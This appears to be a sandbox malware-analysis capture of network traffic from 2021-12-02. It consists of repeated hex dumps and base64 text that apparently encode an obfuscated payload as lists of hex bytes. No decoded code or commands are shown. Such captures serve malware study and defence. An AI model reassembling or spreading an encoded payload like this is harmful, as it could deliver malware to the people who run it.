4f 55 4d 73 59 44 51 31 4c
                                                      Data Ascii: AyOCxgMUEsYEQyLGAwQixgNkIsYDNDLGA5QyxgRDUsYEEzLGA1QSxgQkUsYEY5LGA4OSxgRkYsYDVFLGBBNixgNDMsYEEzLGBFOSxgMzIsYDJFLGBFQSxgNzgsYEQxLGBENixgMTAsYDlFLGBDMyxgRTUsYDY1LGA3OSxgNzcsYDZELGAyOSxgRUUsYDIyLGAzMixgNUEsYEE2LGBCQyxgMDgsYEQ2LGA0QyxgNUYsYDZELGBCNyxgOUMsYDQ1L
                                                      2021-12-02 17:26:37 UTC1575INData Raw: 41 35 51 53 78 67 4f 55 49 73 59 44 5a 43 4c 47 41 31 51 79 78 67 51 54 4d 73 59 45 51 31 4c 47 41 77 4e 53 78 67 4e 45 55 73 59 45 52 47 4c 47 42 43 4f 53 78 67 4d 7a 4d 73 59 44 49 30 4c 47 42 43 4e 79 78 67 52 6a 45 73 59 45 4a 42 4c 47 41 30 4e 53 78 67 4e 6b 4d 73 59 44 59 77 4c 47 42 43 4d 79 78 67 52 44 51 73 59 45 59 31 4c 47 41 31 51 79 78 67 4d 55 59 73 59 45 4d 35 4c 47 42 47 4f 53 78 67 4e 6a 67 73 59 44 6b 78 4c 47 41 7a 51 79 78 67 4d 45 55 73 59 45 45 78 4c 47 41 31 51 53 78 67 4f 44 59 73 59 44 5a 45 4c 47 42 42 4e 79 78 67 4f 45 49 73 59 44 4e 46 4c 47 41 35 52 53 78 67 4d 54 63 73 59 45 4e 43 4c 47 41 32 51 79 78 67 51 6a 63 73 59 44 45 33 4c 47 41 33 51 79 78 67 4d 7a 59 73 59 45 4d 30 4c 47 42 45 4f 53 78 67 4f 44 67 73 59 44 4a 44 4c
                                                      Data Ascii: A5QSxgOUIsYDZCLGA1QyxgQTMsYEQ1LGAwNSxgNEUsYERGLGBCOSxgMzMsYDI0LGBCNyxgRjEsYEJBLGA0NSxgNkMsYDYwLGBCMyxgRDQsYEY1LGA1QyxgMUYsYEM5LGBGOSxgNjgsYDkxLGAzQyxgMEUsYEExLGA1QSxgODYsYDZELGBBNyxgOEIsYDNFLGA5RSxgMTcsYENCLGA2QyxgQjcsYDE3LGA3QyxgMzYsYEM0LGBEOSxgODgsYDJDL
                                                      2021-12-02 17:26:37 UTC1591INData Raw: 42 43 51 69 78 67 52 44 45 73 59 45 55 34 4c 47 42 44 52 69 78 67 4f 44 4d 73 59 45 56 44 4c 47 41 35 4d 69 78 67 51 54 41 73 59 45 52 46 4c 47 42 47 52 53 78 67 4d 7a 6b 73 59 45 59 30 4c 47 41 31 4d 53 78 67 51 6b 49 73 59 45 52 43 4c 47 41 33 4d 43 78 67 4e 7a 6b 73 59 44 55 7a 4c 47 41 34 51 79 78 67 51 30 51 73 59 44 51 31 4c 47 41 79 4e 43 78 67 52 6a 63 73 59 45 45 31 4c 47 42 44 4d 79 78 67 51 54 4d 73 59 44 6b 30 4c 47 41 34 52 43 78 67 4d 6a 6b 73 59 45 4d 31 4c 47 42 44 51 69 78 67 51 6a 49 73 59 44 41 77 4c 47 42 42 4e 79 78 67 52 44 6b 73 59 44 41 30 4c 47 41 7a 52 53 78 67 4e 7a 59 73 59 44 45 31 4c 47 41 34 51 79 78 67 52 45 49 73 59 45 51 31 4c 47 41 35 4e 53 78 67 4d 7a 49 73 59 45 49 79 4c 47 41 30 4d 69 78 67 4d 6a 51 73 59 44 46 42 4c
                                                      Data Ascii: BCQixgRDEsYEU4LGBDRixgODMsYEVDLGA5MixgQTAsYERFLGBGRSxgMzksYEY0LGA1MSxgQkIsYERCLGA3MCxgNzksYDUzLGA4QyxgQ0QsYDQ1LGAyNCxgRjcsYEE1LGBDMyxgQTMsYDk0LGA4RCxgMjksYEM1LGBDQixgQjIsYDAwLGBBNyxgRDksYDA0LGAzRSxgNzYsYDE1LGA4QyxgREIsYEQ1LGA5NSxgMzIsYEIyLGA0MixgMjQsYDFBL
                                                      2021-12-02 17:26:37 UTC1607INData Raw: 41 34 52 43 78 67 51 54 45 73 59 45 56 43 4c 47 41 79 51 69 78 67 4d 44 41 73 59 44 55 33 4c 47 41 34 4e 69 78 67 4e 54 6b 73 59 44 41 35 4c 47 41 77 4e 53 78 67 4e 6a 67 73 59 44 52 46 4c 47 41 79 52 69 78 67 51 6b 49 73 59 44 46 42 4c 47 41 7a 52 43 78 67 4e 30 59 73 59 45 5a 42 4c 47 41 31 51 69 78 67 4d 6a 59 73 59 44 6c 47 4c 47 41 35 4d 43 78 67 51 30 49 73 59 44 4d 33 4c 47 41 78 51 79 78 67 4e 54 63 73 59 45 56 42 4c 47 41 77 52 53 78 67 4d 6b 4d 73 59 44 41 30 4c 47 42 42 4d 53 78 67 51 7a 55 73 59 44 6c 43 4c 47 41 32 52 43 78 67 4f 54 45 73 59 44 63 31 4c 47 41 30 51 53 78 67 4d 44 67 73 59 44 4d 77 4c 47 42 43 4e 69 78 67 52 6a 63 73 59 44 63 77 4c 47 41 33 4d 43 78 67 51 6a 49 73 59 44 63 7a 4c 47 41 32 52 69 78 67 4d 6a 4d 73 59 44 4d 78 4c
                                                      Data Ascii: A4RCxgQTEsYEVCLGAyQixgMDAsYDU3LGA4NixgNTksYDA5LGAwNSxgNjgsYDRFLGAyRixgQkIsYDFBLGAzRCxgN0YsYEZBLGA1QixgMjYsYDlGLGA5MCxgQ0IsYDM3LGAxQyxgNTcsYEVBLGAwRSxgMkMsYDA0LGBBMSxgQzUsYDlCLGA2RCxgOTEsYDc1LGA0QSxgMDgsYDMwLGBCNixgRjcsYDcwLGA3MCxgQjIsYDczLGA2RixgMjMsYDMxL
                                                      2021-12-02 17:26:37 UTC1623INData Raw: 42 46 51 69 78 67 52 6a 67 73 59 44 67 34 4c 47 41 33 4e 43 78 67 4e 7a 4d 73 59 45 52 44 4c 47 42 42 4e 69 78 67 52 6b 59 73 59 44 51 78 4c 47 41 33 51 79 78 67 4f 44 45 73 59 44 46 44 4c 47 42 46 4f 53 78 67 4f 55 51 73 59 45 49 34 4c 47 42 44 4e 53 78 67 52 54 55 73 59 44 49 33 4c 47 42 42 4f 43 78 67 51 30 45 73 59 45 49 79 4c 47 41 79 4d 69 78 67 51 54 6b 73 59 44 5a 46 4c 47 41 30 4e 43 78 67 52 6a 59 73 59 44 68 43 4c 47 41 32 52 69 78 67 4e 30 45 73 59 44 59 79 4c 47 42 44 4f 53 78 67 4f 54 51 73 59 45 55 32 4c 47 41 30 51 53 78 67 52 6a 51 73 59 44 52 43 4c 47 42 43 4e 43 78 67 51 55 4d 73 59 45 5a 45 4c 47 42 45 51 69 78 67 4d 44 63 73 59 44 42 43 4c 47 41 34 51 53 78 67 4e 54 63 73 59 45 52 44 4c 47 41 35 51 53 78 67 4d 45 51 73 59 44 63 79 4c
                                                      Data Ascii: BFQixgRjgsYDg4LGA3NCxgNzMsYERDLGBBNixgRkYsYDQxLGA3QyxgODEsYDFDLGBFOSxgOUQsYEI4LGBDNSxgRTUsYDI3LGBBOCxgQ0EsYEIyLGAyMixgQTksYDZFLGA0NCxgRjYsYDhCLGA2RixgN0EsYDYyLGBDOSxgOTQsYEU2LGA0QSxgRjQsYDRCLGBCNCxgQUMsYEZELGBEQixgMDcsYDBCLGA4QSxgNTcsYERDLGA5QSxgMEQsYDcyL
                                                      2021-12-02 17:26:37 UTC1639INData Raw: 42 42 52 43 78 67 52 55 59 73 59 44 6c 47 4c 47 42 42 52 53 78 67 4e 44 6b 73 59 45 4a 44 4c 47 42 47 51 53 78 67 4d 44 45 73 59 44 59 77 4c 47 41 33 4f 43 78 67 52 54 4d 73 59 44 55 34 4c 47 41 7a 4f 53 78 67 4d 30 45 73 59 44 46 44 4c 47 42 46 4f 53 78 67 4e 55 4d 73 59 45 4a 46 4c 47 41 78 51 53 78 67 52 6a 4d 73 59 45 51 31 4c 47 41 77 4e 69 78 67 4d 6a 49 73 59 45 49 79 4c 47 42 44 4d 53 78 67 4e 30 49 73 59 44 64 44 4c 47 41 34 4d 53 78 67 51 6a 6b 73 59 45 46 43 4c 47 41 33 51 53 78 67 51 55 45 73 59 45 55 34 4c 47 41 79 4f 53 78 67 4f 44 49 73 59 45 59 78 4c 47 42 47 52 43 78 67 4e 7a 51 73 59 44 55 78 4c 47 41 77 4f 53 78 67 51 6b 49 73 59 44 56 44 4c 47 41 78 4e 53 78 67 51 6a 59 73 59 44 56 45 4c 47 41 33 52 53 78 67 52 6a 63 73 59 45 52 42 4c
                                                      Data Ascii: BBRCxgRUYsYDlGLGBBRSxgNDksYEJDLGBGQSxgMDEsYDYwLGA3OCxgRTMsYDU4LGAzOSxgM0EsYDFDLGBFOSxgNUMsYEJFLGAxQSxgRjMsYEQ1LGAwNixgMjIsYEIyLGBDMSxgN0IsYDdDLGA4MSxgQjksYEFCLGA3QSxgQUEsYEU4LGAyOSxgODIsYEYxLGBGRCxgNzQsYDUxLGAwOSxgQkIsYDVDLGAxNSxgQjYsYDVELGA3RSxgRjcsYERBL
                                                      2021-12-02 17:26:37 UTC1655INData Raw: 42 47 4f 53 78 67 4e 6a 41 73 59 45 56 44 4c 47 41 79 4e 79 78 67 4d 55 49 73 59 44 59 7a 4c 47 41 33 4d 43 78 67 51 30 51 73 59 45 55 77 4c 47 41 7a 4e 79 78 67 4e 6b 51 73 59 45 51 34 4c 47 41 35 52 53 78 67 52 45 49 73 59 44 41 30 4c 47 42 43 4d 43 78 67 4d 7a 51 73 59 44 4a 45 4c 47 41 30 4d 53 78 67 52 55 51 73 59 45 5a 46 4c 47 41 7a 4e 79 78 67 4d 7a 67 73 59 44 45 77 4c 47 41 30 51 53 78 67 4e 6b 49 73 59 44 46 46 4c 47 41 78 51 69 78 67 4d 6a 4d 73 59 44 55 32 4c 47 42 43 51 79 78 67 51 55 51 73 59 44 42 43 4c 47 41 78 4e 53 78 67 52 6b 59 73 59 45 45 32 4c 47 41 7a 4e 79 78 67 4d 55 55 73 59 45 49 31 4c 47 41 77 52 53 78 67 52 54 55 73 59 44 45 30 4c 47 41 7a 4f 43 78 67 4e 30 59 73 59 44 6b 78 4c 47 41 77 4e 69 78 67 4d 6a 67 73 59 44 6c 46 4c
                                                      Data Ascii: BGOSxgNjAsYEVDLGAyNyxgMUIsYDYzLGA3MCxgQ0QsYEUwLGAzNyxgNkQsYEQ4LGA5RSxgREIsYDA0LGBCMCxgMzQsYDJELGA0MSxgRUQsYEZFLGAzNyxgMzgsYDEwLGA0QSxgNkIsYDFFLGAxQixgMjMsYDU2LGBCQyxgQUQsYDBCLGAxNSxgRkYsYEE2LGAzNyxgMUUsYEI1LGAwRSxgRTUsYDE0LGAzOCxgN0YsYDkxLGAwNixgMjgsYDlFL
                                                      2021-12-02 17:26:37 UTC1671INData Raw: 41 34 4e 43 78 67 52 44 67 73 59 45 51 77 4c 47 42 47 4e 69 78 67 4d 30 45 73 59 45 4d 79 4c 47 41 30 4d 53 78 67 51 55 4d 73 59 44 46 45 4c 47 41 78 4d 43 78 67 4f 44 41 73 59 44 4d 30 4c 47 41 30 4f 43 78 67 4d 6a 6b 73 59 45 55 33 4c 47 41 35 4d 69 78 67 52 6b 49 73 59 45 55 30 4c 47 42 45 52 69 78 67 4e 6b 51 73 59 44 6b 31 4c 47 42 46 4e 69 78 67 52 55 49 73 59 44 59 30 4c 47 41 32 4d 53 78 67 4f 45 45 73 59 45 45 31 4c 47 42 43 51 69 78 67 4e 45 45 73 59 44 59 30 4c 47 42 45 4d 79 78 67 51 54 59 73 59 45 4e 45 4c 47 42 44 4d 43 78 67 4e 55 4d 73 59 44 6b 35 4c 47 41 33 4f 43 78 67 4e 54 55 73 59 44 51 30 4c 47 41 77 4e 69 78 67 4d 7a 6b 73 59 45 46 43 4c 47 42 42 51 69 78 67 52 44 49 73 59 44 41 77 4c 47 42 47 51 79 78 67 4f 45 59 73 59 44 4a 45 4c
                                                      Data Ascii: A4NCxgRDgsYEQwLGBGNixgM0EsYEMyLGA0MSxgQUMsYDFELGAxMCxgODAsYDM0LGA0OCxgMjksYEU3LGA5MixgRkIsYEU0LGBERixgNkQsYDk1LGBFNixgRUIsYDY0LGA2MSxgOEEsYEE1LGBCQixgNEEsYDY0LGBEMyxgQTYsYENELGBDMCxgNUMsYDk5LGA3OCxgNTUsYDQ0LGAwNixgMzksYEFCLGBBQixgRDIsYDAwLGBGQyxgOEYsYDJEL
                                                      2021-12-02 17:26:37 UTC1687INData Raw: 41 33 4f 43 78 67 51 54 4d 73 59 44 63 32 4c 47 41 32 4f 53 78 67 51 6b 55 73 59 44 49 30 4c 47 41 7a 52 43 78 67 4e 54 63 73 59 44 51 77 4c 47 41 33 51 53 78 67 4d 55 4d 73 59 45 4d 33 4c 47 41 77 4e 79 78 67 51 7a 4d 73 59 44 42 47 4c 47 42 46 52 69 78 67 4d 54 59 73 59 44 68 42 4c 47 41 33 4f 43 78 67 51 6a 55 73 59 44 6b 31 4c 47 41 78 52 43 78 67 4d 30 55 73 59 45 49 31 4c 47 41 79 51 69 78 67 4d 30 45 73 59 45 4d 34 4c 47 41 77 51 79 78 67 4d 45 55 73 59 44 45 79 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 41 31 4c 47 41 33 51 53 78 67 4f 55 55 73 59 45 49 79 4c 47 41 35 52 69 78 67 4d 44 67 73 59 45 46 42 4c 47 41 35 4f 53 78 67 4d 6b 4d 73 59 45 4d 33 4c 47 42 43 51 69 78 67 4d 44 59 73 59 44 52 43 4c 47 41 35 4e 79 78 67 4e 54 6b 73 59 45 49 77 4c
                                                      Data Ascii: A3OCxgQTMsYDc2LGA2OSxgQkUsYDI0LGAzRCxgNTcsYDQwLGA3QSxgMUMsYEM3LGAwNyxgQzMsYDBGLGBFRixgMTYsYDhBLGA3OCxgQjUsYDk1LGAxRCxgM0UsYEI1LGAyQixgM0EsYEM4LGAwQyxgMEUsYDEyLGAwMCxgOEQsYDA1LGA3QSxgOUUsYEIyLGA5RixgMDgsYEFBLGA5OSxgMkMsYEM3LGBCQixgMDYsYDRCLGA5NyxgNTksYEIwL
                                                      2021-12-02 17:26:37 UTC1703INData Raw: 42 46 4e 53 78 67 4d 45 4d 73 59 45 45 34 4c 47 41 32 51 53 78 67 4e 6a 51 73 59 45 51 31 4c 47 41 7a 4d 79 78 67 51 6b 55 73 59 44 59 31 4c 47 41 79 4d 43 78 67 4d 6a 6b 73 59 45 4d 77 4c 47 42 44 51 79 78 67 52 45 55 73 59 45 46 45 4c 47 41 35 51 69 78 67 4e 45 51 73 59 45 4d 77 4c 47 42 45 4d 53 78 67 51 7a 49 73 59 45 52 43 4c 47 41 32 52 43 78 67 51 54 63 73 59 45 51 79 4c 47 42 45 4e 69 78 67 4f 45 4d 73 59 45 55 78 4c 47 41 31 51 69 78 67 4d 44 6b 73 59 45 59 33 4c 47 41 32 4f 43 78 67 4d 55 59 73 59 44 6b 35 4c 47 41 7a 4d 53 78 67 52 6b 55 73 59 44 41 79 4c 47 41 33 4e 69 78 67 4e 44 63 73 59 44 63 35 4c 47 41 30 52 53 78 67 4d 6b 4d 73 59 44 4e 45 4c 47 42 47 4d 79 78 67 51 30 4d 73 59 44 56 45 4c 47 42 46 4d 79 78 67 51 55 49 73 59 45 4a 42 4c
                                                      Data Ascii: BFNSxgMEMsYEE4LGA2QSxgNjQsYEQ1LGAzMyxgQkUsYDY1LGAyMCxgMjksYEMwLGBDQyxgREUsYEFELGA5QixgNEQsYEMwLGBEMSxgQzIsYERCLGA2RCxgQTcsYEQyLGBENixgOEMsYEUxLGA1QixgMDksYEY3LGA2OCxgMUYsYDk5LGAzMSxgRkUsYDAyLGA3NixgNDcsYDc5LGA0RSxgMkMsYDNELGBGMyxgQ0MsYDVELGBFMyxgQUIsYEJBL
                                                      2021-12-02 17:26:37 UTC1719INData Raw: 41 35 4d 43 78 67 52 55 4d 73 59 44 45 34 4c 47 42 45 52 69 78 67 52 54 4d 73 59 44 4d 32 4c 47 41 77 4d 53 78 67 4d 54 67 73 59 45 4a 42 4c 47 42 47 4d 79 78 67 52 45 45 73 59 44 49 7a 4c 47 42 44 4d 43 78 67 4e 54 45 73 59 44 55 32 4c 47 42 46 4e 53 78 67 4d 30 49 73 59 44 6b 34 4c 47 41 7a 51 79 78 67 51 7a 6b 73 59 44 6b 79 4c 47 41 32 51 79 78 67 4d 6b 49 73 59 44 63 79 4c 47 42 42 4e 43 78 67 4e 55 55 73 59 45 56 45 4c 47 41 7a 4d 79 78 67 4d 54 41 73 59 45 51 79 4c 47 41 33 4d 69 78 67 52 44 55 73 59 45 51 35 4c 47 41 7a 4e 53 78 67 4e 54 63 73 59 45 5a 43 4c 47 41 34 51 69 78 67 52 6b 45 73 59 44 4d 78 4c 47 42 46 4f 53 78 67 4e 7a 67 73 59 45 45 35 4c 47 41 31 4e 79 78 67 4e 7a 4d 73 59 44 6b 30 4c 47 42 47 4e 43 78 67 52 55 59 73 59 45 45 34 4c
                                                      Data Ascii: A5MCxgRUMsYDE4LGBERixgRTMsYDM2LGAwMSxgMTgsYEJBLGBGMyxgREEsYDIzLGBDMCxgNTEsYDU2LGBFNSxgM0IsYDk4LGAzQyxgQzksYDkyLGA2QyxgMkIsYDcyLGBBNCxgNUUsYEVELGAzMyxgMTAsYEQyLGA3MixgRDUsYEQ5LGAzNSxgNTcsYEZCLGA4QixgRkEsYDMxLGBFOSxgNzgsYEE5LGA1NyxgNzMsYDk0LGBGNCxgRUYsYEE4L
                                                      2021-12-02 17:26:37 UTC1735INData Raw: 42 47 4f 43 78 67 4d 44 51 73 59 45 45 78 4c 47 42 44 4f 43 78 67 4e 30 4d 73 59 44 6b 33 4c 47 41 78 4f 53 78 67 4f 54 59 73 59 44 45 78 4c 47 41 77 52 53 78 67 4d 54 67 73 59 44 55 32 4c 47 41 79 51 69 78 67 4e 54 67 73 59 45 56 47 4c 47 41 30 51 69 78 67 4f 55 51 73 59 45 5a 44 4c 47 41 35 52 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 30 4d 53 78 67 52 55 45 73 59 44 45 79 4c 47 41 77 52 69 78 67 4e 55 4d 73 59 44 45 7a 4c 47 41 35 51 53 78 67 52 54 63 73 59 44 45 77 4c 47 41 35 4e 43 78 67 4d 44 59 73 59 45 45 31 4c 47 42 46 4e 79 78 67 4f 44 63 73 59 44 5a 43 4c 47 41 33 4e 79 78 67 52 6a 6b 73 59 45 56 44 4c 47 41 77 4e 43 78 67 4d 30 55 73 59 45 55 32 4c 47 41 78 52 53 78 67 4f 54 41 73 59 44 49 34 4c 47 41 77 52 43 78 67 4f 55 45 73 59 44 4d 7a 4c
                                                      Data Ascii: BGOCxgMDQsYEExLGBDOCxgN0MsYDk3LGAxOSxgOTYsYDExLGAwRSxgMTgsYDU2LGAyQixgNTgsYEVGLGA0QixgOUQsYEZDLGA5RCxgRkMsYEU2LGA0MSxgRUEsYDEyLGAwRixgNUMsYDEzLGA5QSxgRTcsYDEwLGA5NCxgMDYsYEE1LGBFNyxgODcsYDZCLGA3NyxgRjksYEVDLGAwNCxgM0UsYEU2LGAxRSxgOTAsYDI4LGAwRCxgOUEsYDMzL
                                                      2021-12-02 17:26:37 UTC1751INData Raw: 41 33 4d 53 78 67 51 6a 55 73 59 44 5a 45 4c 47 42 46 52 53 78 67 52 44 59 73 59 44 49 79 4c 47 41 33 52 53 78 67 4d 30 4d 73 59 44 45 77 4c 47 42 46 4e 79 78 67 4e 6a 45 73 59 44 51 79 4c 47 41 30 4e 53 78 67 4e 7a 45 73 59 44 45 32 4c 47 42 46 51 53 78 67 4e 54 45 73 59 44 55 32 4c 47 41 7a 52 43 78 67 4e 30 49 73 59 44 49 31 4c 47 42 47 52 69 78 67 51 6b 49 73 59 45 51 32 4c 47 42 43 4d 79 78 67 4f 44 55 73 59 45 45 7a 4c 47 41 77 51 69 78 67 4e 54 63 73 59 44 63 32 4c 47 41 33 52 43 78 67 4e 44 6b 73 59 45 5a 46 4c 47 42 44 4d 53 78 67 4d 7a 6b 73 59 44 46 44 4c 47 41 77 52 53 78 67 4e 54 6b 73 59 44 41 7a 4c 47 41 33 52 43 78 67 51 7a 45 73 59 45 5a 42 4c 47 42 47 4e 79 78 67 4e 7a 67 73 59 45 51 77 4c 47 42 47 51 53 78 67 52 6a 6b 73 59 45 49 35 4c
                                                      Data Ascii: A3MSxgQjUsYDZELGBFRSxgRDYsYDIyLGA3RSxgM0MsYDEwLGBFNyxgNjEsYDQyLGA0NSxgNzEsYDE2LGBFQSxgNTEsYDU2LGAzRCxgN0IsYDI1LGBGRixgQkIsYEQ2LGBCMyxgODUsYEEzLGAwQixgNTcsYDc2LGA3RCxgNDksYEZFLGBDMSxgMzksYDFDLGAwRSxgNTksYDAzLGA3RCxgQzEsYEZBLGBGNyxgNzgsYEQwLGBGQSxgRjksYEI5L
                                                      2021-12-02 17:26:37 UTC1767INData Raw: 42 44 52 53 78 67 4e 54 67 73 59 45 56 43 4c 47 41 31 52 53 78 67 4e 44 55 73 59 44 45 7a 4c 47 41 32 51 53 78 67 4e 54 63 73 59 44 63 78 4c 47 41 79 4d 79 78 67 52 55 55 73 59 45 55 78 4c 47 41 79 4d 79 78 67 4e 54 4d 73 59 45 59 32 4c 47 41 30 52 43 78 67 52 6a 41 73 59 44 55 31 4c 47 42 43 4d 69 78 67 51 6a 63 73 59 45 59 79 4c 47 41 79 4d 53 78 67 51 7a 45 73 59 45 4e 47 4c 47 41 7a 52 53 78 67 52 54 49 73 59 45 59 35 4c 47 41 79 4d 43 78 67 52 45 45 73 59 45 4e 46 4c 47 42 43 4e 43 78 67 4e 44 59 73 59 45 52 45 4c 47 41 79 52 53 78 67 52 6a 6b 73 59 45 49 35 4c 47 41 78 4e 53 78 67 4f 54 4d 73 59 44 55 34 4c 47 41 78 4e 79 78 67 4e 55 59 73 59 44 59 35 4c 47 41 34 52 53 78 67 4d 6b 49 73 59 44 67 33 4c 47 42 42 4f 43 78 67 4f 44 59 73 59 45 4d 33 4c
                                                      Data Ascii: BDRSxgNTgsYEVCLGA1RSxgNDUsYDEzLGA2QSxgNTcsYDcxLGAyMyxgRUUsYEUxLGAyMyxgNTMsYEY2LGA0RCxgRjAsYDU1LGBCMixgQjcsYEYyLGAyMSxgQzEsYENGLGAzRSxgRTIsYEY5LGAyMCxgREEsYENFLGBCNCxgNDYsYERELGAyRSxgRjksYEI5LGAxNSxgOTMsYDU4LGAxNyxgNUYsYDY5LGA4RSxgMkIsYDg3LGBBOCxgODYsYEM3L
                                                      2021-12-02 17:26:37 UTC1783INData Raw: 42 46 51 69 78 67 52 44 59 73 59 44 55 78 4c 47 42 43 4f 53 78 67 52 44 6b 73 59 44 51 34 4c 47 42 45 52 53 78 67 4f 44 6b 73 59 44 67 7a 4c 47 41 30 51 79 78 67 51 6b 45 73 59 45 45 32 4c 47 41 78 51 79 78 67 4e 55 51 73 59 44 6b 7a 4c 47 42 43 52 43 78 67 4e 54 55 73 59 45 55 79 4c 47 41 7a 51 79 78 67 4f 44 59 73 59 44 4d 32 4c 47 41 78 4e 79 78 67 4e 55 4d 73 59 45 56 44 4c 47 42 47 4f 53 78 67 4e 45 51 73 59 45 51 78 4c 47 41 30 4f 53 78 67 51 55 4d 73 59 44 4d 33 4c 47 41 33 4e 69 78 67 4e 54 63 73 59 44 63 32 4c 47 41 30 4d 53 78 67 4d 54 6b 73 59 44 6c 42 4c 47 41 35 52 43 78 67 4d 44 63 73 59 45 55 33 4c 47 41 30 52 53 78 67 52 54 67 73 59 45 55 31 4c 47 41 31 4e 43 78 67 4d 44 67 73 59 45 51 77 4c 47 41 31 4f 43 78 67 4d 45 4d 73 59 44 67 35 4c
                                                      Data Ascii: BFQixgRDYsYDUxLGBCOSxgRDksYDQ4LGBERSxgODksYDgzLGA0QyxgQkEsYEE2LGAxQyxgNUQsYDkzLGBCRCxgNTUsYEUyLGAzQyxgODYsYDM2LGAxNyxgNUMsYEVDLGBGOSxgNEQsYEQxLGA0OSxgQUMsYDM3LGA3NixgNTcsYDc2LGA0MSxgMTksYDlBLGA5RCxgMDcsYEU3LGA0RSxgRTgsYEU1LGA1NCxgMDgsYEQwLGA1OCxgMEMsYDg5L
                                                      2021-12-02 17:26:37 UTC1799INData Raw: 41 77 52 43 78 67 4e 54 51 73 59 45 5a 46 4c 47 42 45 4e 69 78 67 4e 45 51 73 59 44 52 45 4c 47 42 44 4e 53 78 67 52 55 59 73 59 44 45 79 4c 47 41 77 4d 69 78 67 4e 7a 6b 73 59 45 59 78 4c 47 41 34 4d 43 78 67 4e 55 45 73 59 44 55 77 4c 47 42 43 4e 53 78 67 51 30 49 73 59 44 41 78 4c 47 42 45 4e 69 78 67 51 54 59 73 59 45 51 78 4c 47 42 42 52 69 78 67 52 6a 6b 73 59 45 55 35 4c 47 41 30 4d 69 78 67 52 55 49 73 59 44 6b 78 4c 47 41 33 4d 53 78 67 4e 30 51 73 59 44 46 44 4c 47 41 79 51 69 78 67 4f 45 49 73 59 44 59 77 4c 47 41 77 51 69 78 67 4e 30 59 73 59 45 51 77 4c 47 42 45 51 53 78 67 4e 7a 4d 73 59 44 59 78 4c 47 42 42 4d 53 78 67 4e 30 4d 73 59 45 5a 47 4c 47 41 30 4d 43 78 67 4e 55 49 73 59 44 51 31 4c 47 41 79 52 69 78 67 52 45 49 73 59 44 63 31 4c
                                                      Data Ascii: AwRCxgNTQsYEZFLGBENixgNEQsYDRELGBDNSxgRUYsYDEyLGAwMixgNzksYEYxLGA4MCxgNUEsYDUwLGBCNSxgQ0IsYDAxLGBENixgQTYsYEQxLGBBRixgRjksYEU5LGA0MixgRUIsYDkxLGA3MSxgN0QsYDFDLGAyQixgOEIsYDYwLGAwQixgN0YsYEQwLGBEQSxgNzMsYDYxLGBBMSxgN0MsYEZGLGA0MCxgNUIsYDQ1LGAyRixgREIsYDc1L
                                                      2021-12-02 17:26:37 UTC1815INData Raw: 42 44 4f 53 78 67 4f 55 59 73 59 45 45 32 4c 47 41 7a 4e 43 78 67 4d 6a 67 73 59 45 55 33 4c 47 42 42 52 69 78 67 52 6b 51 73 59 45 59 35 4c 47 42 45 4e 43 78 67 52 54 55 73 59 45 49 77 4c 47 41 35 4d 43 78 67 4e 45 45 73 59 45 55 33 4c 47 42 46 52 69 78 67 4d 44 6b 73 59 44 49 31 4c 47 41 34 4f 53 78 67 52 44 59 73 59 44 67 78 4c 47 42 47 4e 43 78 67 4f 54 49 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4e 6a 51 73 59 45 55 31 4c 47 41 77 51 53 78 67 52 44 63 73 59 44 6b 79 4c 47 42 44 4e 69 78 67 4e 44 4d 73 59 44 52 42 4c 47 42 42 4d 43 78 67 4d 44 4d 73 59 44 64 44 4c 47 42 44 4e 53 78 67 4e 7a 4d 73 59 44 6b 30 4c 47 41 31 4d 79 78 67 4d 54 4d 73 59 45 49 33 4c 47 41 78 51 69 78 67 4d 6a 6b 73 59 44 52 44 4c 47 42 44 4e 69 78 67 4e 54 41 73 59 44 59 31 4c
                                                      Data Ascii: BDOSxgOUYsYEE2LGAzNCxgMjgsYEU3LGBBRixgRkQsYEY5LGBENCxgRTUsYEIwLGA5MCxgNEEsYEU3LGBFRixgMDksYDI1LGA4OSxgRDYsYDgxLGBGNCxgOTIsYDBBLGAwMCxgNjQsYEU1LGAwQSxgRDcsYDkyLGBDNixgNDMsYDRBLGBBMCxgMDMsYDdDLGBDNSxgNzMsYDk0LGA1MyxgMTMsYEI3LGAxQixgMjksYDRDLGBDNixgNTAsYDY1L
                                                      2021-12-02 17:26:37 UTC1831INData Raw: 41 34 51 69 78 67 4d 45 49 73 59 44 5a 46 4c 47 42 43 52 43 78 67 52 54 51 73 59 44 4e 42 4c 47 41 77 51 69 78 67 4d 45 4d 73 59 45 45 33 4c 47 41 32 4d 53 78 67 4f 45 51 73 59 44 4d 34 4c 47 42 43 4d 43 78 67 4e 44 6b 73 59 44 67 32 4c 47 41 35 4d 69 78 67 52 6a 59 73 59 44 67 77 4c 47 41 33 4e 43 78 67 4e 6b 49 73 59 45 45 78 4c 47 41 78 52 69 78 67 4d 6a 45 73 59 44 42 45 4c 47 41 78 52 43 78 67 4e 6a 6b 73 59 44 56 44 4c 47 41 35 51 69 78 67 4e 6b 59 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 55 51 73 59 44 55 32 4c 47 41 34 4d 53 78 67 51 7a 55 73 59 45 52 45 4c 47 41 7a 4d 53 78 67 4d 55 51 73 59 45 51 31 4c 47 42 43 4f 43 78 67 4e 6a 49 73 59 44 68 44 4c 47 41 79 52 69 78 67 52 6a 6b 73 59 44 42 43 4c 47 41 31 52 53 78 67 4e 44 63 73 59 45 45 7a 4c
                                                      Data Ascii: A4QixgMEIsYDZFLGBCRCxgRTQsYDNBLGAwQixgMEMsYEE3LGA2MSxgOEQsYDM4LGBCMCxgNDksYDg2LGA5MixgRjYsYDgwLGA3NCxgNkIsYEExLGAxRixgMjEsYDBELGAxRCxgNjksYDVDLGA5QixgNkYsYDAwLGA2NixgOUQsYDU2LGA4MSxgQzUsYERELGAzMSxgMUQsYEQ1LGBCOCxgNjIsYDhDLGAyRixgRjksYDBCLGA1RSxgNDcsYEEzL
